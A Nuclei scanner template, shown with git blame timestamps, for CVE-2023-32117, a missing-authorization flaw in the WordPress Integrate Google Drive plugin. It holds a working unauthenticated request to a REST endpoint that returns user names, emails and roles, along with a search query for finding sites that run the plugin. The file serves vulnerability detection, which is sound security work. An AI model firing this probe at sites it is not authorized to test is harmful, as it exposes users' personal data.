nuclei-templates/http/cves/2023/CVE-2023-32117.yaml

47 lines
1.5 KiB
YAML
Raw Normal View History

2023-07-30 15:12:56 +00:00
id: CVE-2023-32117
info:
name: Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints
author: DhiyaneshDK
severity: high
2023-08-02 05:44:25 +00:00
description: |
2023-08-02 05:38:15 +00:00
The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.
2023-07-30 15:12:56 +00:00
reference:
- https://github.com/RandomRobbieBF/CVE-2023-32117
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints
2023-08-31 11:46:18 +00:00
remediation: Fixed in 1.2.0
2023-07-30 15:12:56 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2023-32117
metadata:
max-request: 1
publicwww-query: "/wp-content/plugins/integrate-google-drive/"
verified: true
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive
http:
- method: POST
path:
- "{{BaseURL}}/wp-json/igd/v1/get-users-data"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"name":'
- '"email":'
- '"role":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200